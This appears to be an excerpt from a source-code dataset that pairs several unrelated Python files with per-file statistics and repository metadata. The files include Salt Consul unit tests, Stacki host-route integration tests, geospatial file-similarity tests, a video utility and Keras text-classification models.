expected = {"data": "id1", "res": True}
assert expected == result
def test_event_fire():
"""
Test consul event fire
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
name = "name1"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.event_fire(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
pytest.raises(
SaltInvocationError,
consul.event_fire,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.event_fire(consul_url=consul_url, token=token, name=name)
expected = {
"data": "test",
"message": "Event {} fired.".format(name),
"res": True,
}
assert expected == result
def test_event_list():
"""
Test consul event list
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
name = "name1"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.event_list(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
pytest.raises(
SaltInvocationError,
consul.event_list,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.event_list(consul_url=consul_url, token=token, name=name)
expected = {"data": "test", "res": True}
assert expected == result
| 36.624801 | 88 | 0.589269 | 7,633 | 69,111 | 5.073759 | 0.028822 | 0.082498 | 0.052778 | 0.062306 | 0.950966 | 0.935628 | 0.924422 | 0.91714 | 0.907147 | 0.898162 | 0 | 0.010911 | 0.289158 | 69,111 | 1,886 | 89 | 36.644221 | 0.777414 | 0.042193 | 0 | 0.780142 | 0 | 0 | 0.13547 | 0.000702 | 0 | 0 | 0 | 0 | 0.075177 | 1 | 0.029078 | false | 0.004255 | 0.005674 | 0.000709 | 0.035461 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
702a93445c3f063f651f1fb6823670d0959cef8c | 114 | py | Python | quix/pay/exceptions.py | tachang/quix.pay | 751a225bed6cd8afed034f6927784d0aedf21f80 | [
"BSD-3-Clause"
] | null | null | null | quix/pay/exceptions.py | tachang/quix.pay | 751a225bed6cd8afed034f6927784d0aedf21f80 | [
"BSD-3-Clause"
] | null | null | null | quix/pay/exceptions.py | tachang/quix.pay | 751a225bed6cd8afed034f6927784d0aedf21f80 | [
"BSD-3-Clause"
] | null | null | null | from exceptions import Exception
class ValidationError(Exception): pass
class NotSupportedError(Exception): pass
| 22.8 | 40 | 0.850877 | 12 | 114 | 8.083333 | 0.666667 | 0.268041 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096491 | 114 | 4 | 41 | 28.5 | 0.941748 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.666667 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
70345dbb36f0933501884e3d3496180b98c79d8e | 295 | py | Python | gym_brt/control/__init__.py | zuzuba/quanser-openai-driver | c4bec08a8c7ac1c05dec26c863f899f44f15fd06 | [
"MIT"
] | null | null | null | gym_brt/control/__init__.py | zuzuba/quanser-openai-driver | c4bec08a8c7ac1c05dec26c863f899f44f15fd06 | [
"MIT"
] | null | null | null | gym_brt/control/__init__.py | zuzuba/quanser-openai-driver | c4bec08a8c7ac1c05dec26c863f899f44f15fd06 | [
"MIT"
] | null | null | null | from gym_brt.control.control import Control
from gym_brt.control.control import NoControl
from gym_brt.control.control import RandomControl
from gym_brt.control.control import AeroControl
from gym_brt.control.control import QubeHoldControl
from gym_brt.control.control import QubeFlipUpControl
| 36.875 | 53 | 0.874576 | 42 | 295 | 6 | 0.238095 | 0.166667 | 0.238095 | 0.404762 | 0.714286 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0.084746 | 295 | 7 | 54 | 42.142857 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
708d1a4ab435b4bf9a5c3fe5ccb90bcf31108fec | 5,016 | py | Python | Metadataextraction/test_mastersim.py | corneliazy/Geosoftware2 | 8604c79c58a61b84c602f16b5f1e74e30dfcbd0e | [
"MIT"
] | null | null | null | Metadataextraction/test_mastersim.py | corneliazy/Geosoftware2 | 8604c79c58a61b84c602f16b5f1e74e30dfcbd0e | [
"MIT"
] | 47 | 2018-11-13T13:55:01.000Z | 2019-09-16T13:38:11.000Z | Metadataextraction/test_mastersim.py | corneliazy/Geosoftware2 | 8604c79c58a61b84c602f16b5f1e74e30dfcbd0e | [
"MIT"
] | 4 | 2018-11-27T12:36:51.000Z | 2020-10-14T18:07:04.000Z | import click # used to print something
import mastersim #similar # used to invoke the master function
import os # used to get the location of the testdata
__location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
#--detail
click.echo(__location__+'/testdata/')
"""
These tests check if the calucated similar score from two files is
equal to our hand-calculted score
"""
# Bei Tests die Tests 15/16/17 beeinflussen die anderen Tests und aders herum
def test_mastersim_geojson_geotiff():
filepath1 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.geojson'
filepath2 = __location__+'/testdata/wf_100m_klas.tif'
assert mastersim.master(filepath1, filepath2) == 0.02892620198410715
def test_mastersim_geojson_geopackage():
filepath1 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.geojson'
filepath2 = __location__+'/testdata/Queensland_Children_geopackage/census2016_cca_qld_short.gpkg'
assert mastersim.master(filepath1, filepath2) == 1
def test_mastersim_geopackage_geotiff():
filepath1 = __location__+'/testdata/Queensland_Children_geopackage/census2016_cca_qld_short.gpkg'
filepath2 = __location__+'/testdata/wf_100m_klas.tif'
assert mastersim.master(filepath1, filepath2) == 0.8222891646452265
#no crs info available in the shapefile
def test_mastersim_shapefile_equal():
filepath1 = (__location__+'/testdata/Abgrabungen_Kreis_Kleve_shapefile/Abgrabungen_Kreis_Kleve_Shape.shp')
filepath2 = (__location__+'/testdata/Abgrabungen_Kreis_Kleve_shapefile/Abgrabungen_Kreis_Kleve_Shape.shp')
assert mastersim.master(filepath1, filepath2) == 1
def test_mastersim_geojson_equal():
filepath1 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.geojson'
filepath2 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.geojson'
assert mastersim.master(filepath1, filepath2) == 0
def test_mastersim_geotiff_equal():
filepath1 = __location__+'/testdata/wf_100m_klas.tif'
filepath2 = __location__+'/testdata/wf_100m_klas.tif'
assert mastersim.master(filepath1, filepath2) == 0
# No CRS info available
def test_mastersim_csv_equal():
filepath1 = __location__+'/testdata/Behindertenparkplaetze_Duesseldorf.csv'
filepath2 = __location__+'/testdata/Behindertenparkplaetze_Duesseldorf.csv'
assert mastersim.master(filepath1, filepath2) == 1
def test_mastersim_netcdf_equal():
filepath1 =__location__+'/testdata/ECMWF_ERA-40_subset1.nc'
filepath2 = __location__+'/testdata/ECMWF_ERA-40_subset1.nc'
assert mastersim.master(filepath1, filepath2) == 0
def test_mastersim_geopackage_equal():
filepath1 = __location__+'/testdata/Queensland_Children_geopackage/census2016_cca_qld_short.gpkg'
filepath2 = __location__+'/testdata/Queensland_Children_geopackage/census2016_cca_qld_short.gpkg'
assert mastersim.master(filepath1, filepath2) == 0
def test_mastersim_gml_equal():
filepath1 = __location__+'/testdata/3D_LoD1_33390_5664.gml'
filepath2 = __location__+'/testdata/3D_LoD1_33390_5664.gml'
assert mastersim.master(filepath1, filepath2) == 0
def test_mastersim_gml_geopackage():
filepath1 = __location__+'/testdata/3D_LoD1_33390_5664.gml'
filepath2 = __location__+'/testdata/Queensland_Children_geopackage/census2016_cca_qld_short.gpkg'
assert mastersim.master(filepath1, filepath2) == 1
def test_mastersim_netcdf_geopackage():
filepath1 = __location__+'/testdata/ECMWF_ERA-40_subset1.nc'
filepath2 = __location__+'/testdata/Queensland_Children_geopackage/census2016_cca_qld_short.gpkg'
assert mastersim.master(filepath1, filepath2) == 0.6570352358501073
# no crs info available in the shapefile
def test_mastersim_geojson_shapefile():
filepath1 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.geojson'
filepath2 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.shp'
assert mastersim.master(filepath1, filepath2) == 1
# no crs info available in the csv
def test_mastersim_geojson_csv():
filepath1 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.geojson'
filepath2 = __location__+'/testdata/Baumfaellungen_Duesseldorf.csv'
assert mastersim.master(filepath1, filepath2) == 1
# no crs info available in the csv
def test_mastersim_csv_shapefile():
filepath1 = __location__+'/testdata/Baumfaellungen_Duesseldorf.csv'
filepath2 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.shp'
assert mastersim.master(filepath1, filepath2) == 1
# no crs info available in the shapefile
def test_mastersim_geotiff_shapefile():
filepath1 = __location__+'/testdata/wf_100m_klas.tif'
filepath2 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.shp'
assert mastersim.master(filepath1, filepath2) == 1
# no crs info available in the shapefile
def test_mastersim_gml_shapefile():
filepath1 = __location__+'/testdata/3D_LoD1_33390_5664.gml'
filepath2 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.shp'
assert mastersim.master(filepath1, filepath2) == 1 | 47.320755 | 111 | 0.786085 | 586 | 5,016 | 6.228669 | 0.168942 | 0.153425 | 0.074521 | 0.139726 | 0.812603 | 0.769589 | 0.765205 | 0.749863 | 0.742192 | 0.696164 | 0 | 0.052715 | 0.122608 | 5,016 | 106 | 112 | 47.320755 | 0.776642 | 0.08752 | 0 | 0.534247 | 0 | 0 | 0.339093 | 0.336849 | 0 | 0 | 0 | 0 | 0.232877 | 1 | 0.232877 | false | 0 | 0.041096 | 0 | 0.273973 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
566009b4d42d20e90fd2c8d11c431951ae6e35b7 | 5,190 | py | Python | test-framework/test-suites/integration/tests/remove/test_remove_host_route.py | knutsonchris/stacki | 33087dd5fa311984a66ccecfeee6f9c2c25f665d | [
"BSD-3-Clause"
] | 123 | 2015-05-12T23:36:45.000Z | 2017-07-05T23:26:57.000Z | test-framework/test-suites/integration/tests/remove/test_remove_host_route.py | knutsonchris/stacki | 33087dd5fa311984a66ccecfeee6f9c2c25f665d | [
"BSD-3-Clause"
] | 177 | 2015-06-05T19:17:47.000Z | 2017-07-07T17:57:24.000Z | test-framework/test-suites/integration/tests/remove/test_remove_host_route.py | knutsonchris/stacki | 33087dd5fa311984a66ccecfeee6f9c2c25f665d | [
"BSD-3-Clause"
] | 32 | 2015-06-07T02:25:03.000Z | 2017-06-23T07:35:35.000Z | import json
from textwrap import dedent
class TestRemoveHostRoute:
def test_invalid_host(self, host):
result = host.run('stack remove host route test')
assert result.rc == 255
assert result.stderr == 'error - cannot resolve host "test"\n'
def test_no_args(self, host):
result = host.run('stack remove host route')
assert result.rc == 255
assert result.stderr == dedent('''\
error - "host" argument is required
{host ...} {address=string} [syncnow=string]
''')
def test_no_host_matches(self, host):
result = host.run('stack remove host route a:test address=127.0.0.3')
assert result.rc == 255
assert result.stderr == dedent('''\
error - "host" argument is required
{host ...} {address=string} [syncnow=string]
''')
def test_no_address(self, host):
result = host.run('stack remove host route frontend-0-0')
assert result.rc == 255
assert result.stderr == dedent('''\
error - "address" parameter is required
{host ...} {address=string} [syncnow=string]
''')
def test_no_syncnow(self, host, revert_routing_table, revert_etc):
# Add a route with sync now so it is added to the routing table
result = host.run(
'stack add host route frontend-0-0 '
'address=127.0.0.3 gateway=127.0.0.3 syncnow=true'
)
assert result.rc == 0
# Confirm it is in the DB
result = host.run('stack list host route frontend-0-0 output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'gateway': '127.0.0.3',
'host': 'frontend-0-0',
'interface': None,
'netmask': '255.255.255.255',
'network': '127.0.0.3',
'source': 'H',
'subnet': None
},
{
'gateway': None,
'host': 'frontend-0-0',
'interface': 'eth1',
'netmask': '255.255.255.0',
'network': '224.0.0.0',
'source': 'G',
'subnet': 'private'
},
{
'gateway': None,
'host': 'frontend-0-0',
'interface': 'eth1',
'netmask': '255.255.255.255',
'network': '255.255.255.255',
'source': 'G',
'subnet': 'private'
}
]
# Also check that the test route is in our routing table
result = host.run('ip route list')
assert result.rc == 0
assert '127.0.0.3 via 127.0.0.3' in result.stdout
# Now remove it from the the DB, but don't sync
result = host.run('stack remove host route frontend-0-0 address=127.0.0.3')
assert result.rc == 0
# Confirm it is no longer in the DB
result = host.run('stack list host route frontend-0-0 output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'gateway': None,
'host': 'frontend-0-0',
'interface': 'eth1',
'netmask': '255.255.255.0',
'network': '224.0.0.0',
'source': 'G',
'subnet': 'private'
},
{
'gateway': None,
'host': 'frontend-0-0',
'interface': 'eth1',
'netmask': '255.255.255.255',
'network': '255.255.255.255',
'source': 'G',
'subnet': 'private'
}
]
# Make sure it is still in the routing table
result = host.run('ip route list')
assert result.rc == 0
assert '127.0.0.3 via 127.0.0.3' in result.stdout
def test_with_syncnow(self, host, revert_routing_table, revert_etc):
# Add a route with sync now so it is added to the routing table
result = host.run(
'stack add host route frontend-0-0 '
'address=127.0.0.3 gateway=127.0.0.3 syncnow=true'
)
assert result.rc == 0
# Confirm it is in the DB
result = host.run('stack list host route frontend-0-0 output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'gateway': '127.0.0.3',
'host': 'frontend-0-0',
'interface': None,
'netmask': '255.255.255.255',
'network': '127.0.0.3',
'source': 'H',
'subnet': None
},
{
'gateway': None,
'host': 'frontend-0-0',
'interface': 'eth1',
'netmask': '255.255.255.0',
'network': '224.0.0.0',
'source': 'G',
'subnet': 'private'
},
{
'gateway': None,
'host': 'frontend-0-0',
'interface': 'eth1',
'netmask': '255.255.255.255',
'network': '255.255.255.255',
'source': 'G',
'subnet': 'private'
}
]
# Also check that the test route is in our routing table
result = host.run('ip route list')
assert result.rc == 0
assert '127.0.0.3 via 127.0.0.3' in result.stdout
# Now remove it from the the DB and sync
result = host.run(
'stack remove host route frontend-0-0 address=127.0.0.3 syncnow=true'
)
assert result.rc == 0
# Confirm it is no longer in the DB
result = host.run('stack list host route frontend-0-0 output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'gateway': None,
'host': 'frontend-0-0',
'interface': 'eth1',
'netmask': '255.255.255.0',
'network': '224.0.0.0',
'source': 'G',
'subnet': 'private'
},
{
'gateway': None,
'host': 'frontend-0-0',
'interface': 'eth1',
'netmask': '255.255.255.255',
'network': '255.255.255.255',
'source': 'G',
'subnet': 'private'
}
]
# Make sure it is gone from the routing table
result = host.run('ip route list')
assert result.rc == 0
assert '127.0.0.3 via 127.0.0.3' not in result.stdout
| 26.752577 | 77 | 0.6079 | 776 | 5,190 | 4.041237 | 0.115979 | 0.029337 | 0.068878 | 0.036352 | 0.932398 | 0.932398 | 0.932398 | 0.921237 | 0.917092 | 0.860651 | 0 | 0.090707 | 0.218304 | 5,190 | 193 | 78 | 26.891192 | 0.682278 | 0.100385 | 0 | 0.72561 | 0 | 0.018293 | 0.438359 | 0 | 0 | 0 | 0 | 0 | 0.170732 | 1 | 0.036585 | false | 0 | 0.012195 | 0 | 0.054878 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3b6a8a06edb1f8ddb53df0b8a374689e4b36aa6e | 1,534 | py | Python | utils/video_utils.py | milandm/cssteam26 | cc003b3b010a722ea075caade26696bd3b896ed8 | [
"MIT"
] | null | null | null | utils/video_utils.py | milandm/cssteam26 | cc003b3b010a722ea075caade26696bd3b896ed8 | [
"MIT"
] | null | null | null | utils/video_utils.py | milandm/cssteam26 | cc003b3b010a722ea075caade26696bd3b896ed8 | [
"MIT"
] | null | null | null | import os
import imageio
run_dir = '/home/andrijazz/storage/saferegions/log/wandb/run-20210818_202909-rjx1cbl9/files'
plots_dir = os.path.join(run_dir, 'plots')
for f in os.scandir(plots_dir):
if not os.path.isdir(f):
continue
layer_name = f.name
layer_path = os.path.join(plots_dir, layer_name)
frames = sorted(os.listdir(layer_path))
video_file = os.path.join(layer_path, layer_name + ".mp4")
writer = imageio.get_writer(video_file, fps=2)
for frame in frames:
writer.append_data(imageio.imread(os.path.join(layer_path, frame)))
writer.close()
# if self.config['log_video']:
# log_dict[f'saferegions/{layer_name}/video'] = wandb.Video(video_file)
def log_video():
# if last epoch log videos
if self.config['train_num_epochs'] - 1 == info['epoch_idx']:
plots_dir = os.path.join(wandb.run.dir, 'plots')
for f in os.scandir(plots_dir):
if not os.path.isdir(f):
continue
layer_name = f.name
layer_path = os.path.join(plots_dir, layer_name)
frames = sorted(os.listdir(layer_path))
video_file = os.path.join(layer_path, layer_name + ".mp4")
writer = imageio.get_writer(video_file, fps=2)
for frame in frames:
writer.append_data(imageio.imread(os.path.join(layer_path, frame)))
writer.close()
if self.config['log_video']:
log_dict[f'saferegions/{layer_name}/video'] = wandb.Video(video_file)
| 36.52381 | 92 | 0.640156 | 220 | 1,534 | 4.268182 | 0.254545 | 0.063898 | 0.085197 | 0.063898 | 0.817891 | 0.779553 | 0.779553 | 0.779553 | 0.779553 | 0.779553 | 0 | 0.017857 | 0.233377 | 1,534 | 41 | 93 | 37.414634 | 0.780612 | 0.08279 | 0 | 0.709677 | 0 | 0 | 0.115549 | 0.078459 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032258 | false | 0 | 0.064516 | 0 | 0.096774 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8e68ffa35654c710aca53efa90af9ef63c51cd3c | 38,816 | py | Python | models.py | aghie/hpac | 1182b5f8e8378b4a5506f8f68c19fd4c08120f92 | [
"MIT"
] | 5 | 2019-05-21T22:40:06.000Z | 2021-05-27T11:56:32.000Z | models.py | aghie/hpac | 1182b5f8e8378b4a5506f8f68c19fd4c08120f92 | [
"MIT"
] | null | null | null | models.py | aghie/hpac | 1182b5f8e8378b4a5506f8f68c19fd4c08120f92 | [
"MIT"
] | 1 | 2021-10-04T16:31:35.000Z | 2021-10-04T16:31:35.000Z | from keras.models import Sequential, Model
from keras.layers import Dense, Dropout, Embedding, Activation, Flatten, Input, Permute, Reshape, Lambda, RepeatVector, Masking
from keras.layers import Conv1D, GlobalMaxPooling1D, LSTM, Bidirectional, SimpleRNN
from keras.optimizers import RMSprop
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from sklearn.naive_bayes import MultinomialNB
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score, classification_report, confusion_matrix
from sklearn.metrics import precision_recall_fscore_support as score
from prettytable import PrettyTable
from keras.layers import merge
from numpy import argmax, average, argsort
from collections import Counter
#from stop_words import get_stop_words
import keras.backend as K
import os
import keras
import codecs
import numpy as np
import model_utils
import random
import pickle
import sklearn
import matplotlib.pyplot as plt
from sklearn.svm.libsvm import predict
LG_NAME = "MLR"
LSTM_NAME = "LSTM"
LSTM_NAME2= "2LSTM"
BILSTM_NAME = "BILSTM"
CNN_NAME = "CNN"
MLP_NAME = "MLP"
ATT_LSTM_NAME = "ATT_LSTM"
RNN_NAME = "RNN"
MAJORITY_NAME = "MAJORITY"
FILTERS="filters"
KERNEL_SIZE="kernel_size"
NEURONS = "neurons"
MLP_NEURONS="mlp_neurons"
MLP_LAYERS="mlp_layers"
DROPOUT = "dropout"
LAYERS = "layers"
EXTERNAL_EMBEDDINGS = "external_embeddings"
#EXTERNAL_EMBEDDINGS="path_embeddings"
INTERNAL_EMBEDDINGS = "internal_embeddings"
DIM_EMBEDDINGS = "dim_embeddings"
BATCH_SIZE = "batch_size"
EPOCHS = "epochs"
TIMESTEPS = "timesteps"
BIDIRECTIONAL = "bidirectional"
OUTPUT_DIR ="output_dir"
class ModelHP(object):
INDEX_TO_PAD = 0
UNK_WORD_INDEX = 1
INIT_REAL_INDEX = 2
SPECIAL_INDEXES = [INDEX_TO_PAD,UNK_WORD_INDEX]
def __init__(self):
self.iforms = None #Re-written in the children classes
self.ilabels =None #Re-written in the children classes
self.model = None
def _get_indexes(self,sentence):
input = [0]*(len(self.iforms)+len(self.SPECIAL_INDEXES))
for word in sentence:
if word in self.iforms:
index = self.iforms[word]
input[index]+=1
return np.array(input)
def generate_data_test(self, lines, batch_size):
i = 0
while i < len(lines):
batch_sample = 0
x = []
y = []
while batch_sample < batch_size and i < len(lines):
ls = lines[i].split('\t')
y.append(self.ilabels[ls[1]])
sample = []
for w in ls[2].split():
sample.append(w)
x.append(self._get_indexes(sample))
batch_sample+=1
i+=1
x = np.array(x)
y = keras.utils.to_categorical(y, num_classes = len(self.ilabels))
if batch_size == 1:
y.reshape(-1,batch_size,y.shape[1])
yield ([x],[y])
def generate_data(self, lines, batch_size):
i = 0
while True:
batch_sample = 0
x = []
y = []
while batch_sample < batch_size:
if i >= len(lines):
i=0 #We prepare the indexes for the next iteration
ls = lines[i].split('\t')
y.append(self.ilabels[ls[1]])
sample = []
for w in ls[2].split():
sample.append(w)
x.append(self._get_indexes(sample))
batch_sample+=1
i+=1
x = np.array(x)
y = keras.utils.to_categorical(y, num_classes = len(self.ilabels))
yield ([x],[y])
def train(self, training_data, dev_data, train_conf, name_model):
batch_size = int(train_conf[BATCH_SIZE])
epochs = int(train_conf[EPOCHS])
save_model_path = train_conf[OUTPUT_DIR]+os.sep+name_model+".hdf5"
save_callback = keras.callbacks.ModelCheckpoint(save_model_path, monitor='val_acc', verbose=0,
save_best_only=True, save_weights_only=False)
early_stopping_cb = keras.callbacks.EarlyStopping(monitor='val_acc', min_delta=0, patience=2, verbose=0, mode='auto')
history = self.model.fit_generator(self.generate_data(training_data,batch_size),
steps_per_epoch = len(training_data)/(batch_size)+1,
epochs = epochs,
validation_data = self.generate_data(dev_data, batch_size),
validation_steps=len(dev_data)/(batch_size)+1,
callbacks = [save_callback,early_stopping_cb],
verbose=1)
return history
def predict(self, test_data):
batch_size = 128
output = self.model.predict_generator(generator = self.generate_data_test(test_data,batch_size),
steps = (len(test_data)/(batch_size))+1 )
return output
def evaluate(self,test_data, test_output):
def recall_at_k(preds, gold, k):
recall = 0.
assert(len(preds)==len(gold))
for p,g in zip(preds,gold):
if g in argsort(-p)[:k]: recall+=1
return recall / len(gold)
gold_output = [self.ilabels[sample.split("\t")[1]] for sample in test_data]
counter_labels = Counter(gold_output)
average_occ = np.average(counter_labels.values())
fgold_output = [g for g in gold_output if counter_labels[g] >= average_occ]
ugold_output = [g for g in gold_output if counter_labels[g] < average_occ]
predicted_output = []
fpredicted_output = []
upredicted_output = []
test_frequent_output = []
gold_frequent_output = []
test_unfrequent_output = []
gold_unfrequent_output = []
assert(len(gold_output) == len(test_output))
for j,sample_out in enumerate(test_output):
predicted_output.append(argmax(sample_out))
if counter_labels[gold_output[j]] >= average_occ:
test_frequent_output.append(sample_out)
gold_frequent_output.append(gold_output[j])
fpredicted_output.append(argmax(sample_out))
else:
upredicted_output.append(argmax(sample_out))
gold_unfrequent_output.append(gold_output[j])
test_unfrequent_output.append(sample_out)
#Calculating Recall@K with Precision@K and F1-score@K
recall_at_1 = recall_at_k(test_output, gold_output, 1)
recall_at_2 = recall_at_k(test_output, gold_output,2)
recall_at_5 = recall_at_k(test_output, gold_output, 5)
recall_at_10 = recall_at_k(test_output, gold_output, 10)
frecall_at_1 = recall_at_k(test_frequent_output, gold_frequent_output, 1)
frecall_at_2 = recall_at_k(test_frequent_output, gold_frequent_output, 2)
frecall_at_5 = recall_at_k(test_frequent_output, gold_frequent_output, 5)
frecall_at_10 = recall_at_k(test_frequent_output, gold_frequent_output, 10)
urecall_at_1 = recall_at_k(test_unfrequent_output, gold_unfrequent_output, 1)
urecall_at_2 = recall_at_k(test_unfrequent_output, gold_unfrequent_output,2)
urecall_at_5 = recall_at_k(test_unfrequent_output, gold_unfrequent_output, 5)
urecall_at_10 = recall_at_k(test_unfrequent_output, gold_unfrequent_output, 10)
precision, recall, fscore, support = score(gold_output, predicted_output)
accuracy = sklearn.metrics.accuracy_score(gold_output, predicted_output)
fprecision, frecall, ffscore, fsupport = score(fgold_output, fpredicted_output)
uprecision, urecal, ufscore, usupport = score(ugold_output, upredicted_output)
p_macro, r_macro, f_macro, support_macro = score(gold_output, predicted_output,
average = "macro")
p_micro, r_micro, f_micro, support_micro = score(gold_output, predicted_output,
average = "micro")
p_weighted, r_weighted, f_weighted, support_weighted = score(gold_output, predicted_output,
average = "weighted")
fp_macro, fr_macro, ff_macro, fsupport_macro = score(fgold_output, fpredicted_output,
average = "macro")
fp_micro, fr_micro, ff_micro, fsupport_micro = score(fgold_output, fpredicted_output,
average = "micro")
fp_weighted, fr_weighted, ff_weighted, fsupport_weigthed = score(fgold_output, fpredicted_output,
average = "weighted")
up_macro, ur_macro, uf_macro, usupport_macro = score(ugold_output, upredicted_output,
average = "macro")
up_micro, ur_micro, uf_micro, usupport_micro = score(ugold_output, upredicted_output,
average = "micro")
up_weighted, ur_weighted, uf_weighted, usupport_micro = score(ugold_output, upredicted_output,
average = "weighted")
list_summary = [accuracy, p_macro, r_macro, f_macro, p_micro, r_micro, f_micro, p_weighted, r_weighted, f_weighted,
recall_at_1, recall_at_2, recall_at_5, recall_at_10,
fp_macro, fr_macro, ff_macro, fp_micro, fr_micro, ff_micro, fp_weighted,fr_weighted, ff_weighted,
frecall_at_1, frecall_at_2, frecall_at_5, frecall_at_10,
up_macro, ur_macro,uf_macro, up_micro, ur_micro, uf_micro,up_weighted, ur_weighted, uf_weighted,
urecall_at_1, urecall_at_2 ,urecall_at_5,urecall_at_10 ]
x = PrettyTable()
# print [self.labelsi[i] for i in range(len(self.labelsi))
# if i in gold_output or i in predicted_output]
x.add_column("Label", [self.labelsi[i] for i in range(len(self.labelsi))
if i in gold_output or i in predicted_output])
x.add_column("Precision", precision)
x.add_column("Recall", recall)
x.add_column("F-score", fscore)
x.add_column("Support", support)
str_output= "Accuracy: "+str(accuracy)+"\n\n"
str_output+= "F-macro: "+str(f_macro)+"\n"
str_output+= "P-macro: "+str(p_macro)+"\n"
str_output+= "R-macro: "+str(r_macro)+"\n\n"
str_output+= "F-micro: "+str(f_micro)+"\n"
str_output+= "P-micro: "+str(p_micro)+"\n"
str_output+= "R-micro: "+str(r_micro)+"\n\n"
str_output+= "F-weighted: "+str(f_weighted)+"\n"
str_output+= "P-weighted: "+str(p_weighted)+"\n"
str_output+= "R-weighted: "+str(r_weighted)+"\n"
str_output+="Recall@1: "+str(recall_at_1)+"\n"
str_output+="Recall@2: "+str(recall_at_2)+"\n"
str_output+="Recall@5: "+str(recall_at_5)+"\n"
str_output+="Recall@10: "+str(recall_at_10)+"\n\n"
str_output+= "-------ONLY FREQUENT SPELLS-------\n\n"
str_output+= "F-macro (>="+str(average_occ)+"): "+str(ff_macro)+"\n"
str_output+= "P-macro (>="+str(average_occ)+"): "+str(fp_macro)+"\n"
str_output+= "R-macro (>="+str(average_occ)+"): "+str(fr_macro)+"\n\n"
str_output+= "F-micro (>="+str(average_occ)+"): "+str(ff_micro)+"\n"
str_output+= "P-micro (>="+str(average_occ)+"): "+str(fp_micro)+"\n"
str_output+= "R-micro (>="+str(average_occ)+"): "+str(fr_micro)+"\n\n"
str_output+= "F-weighted (>="+str(average_occ)+"): "+str(ff_weighted)+"\n"
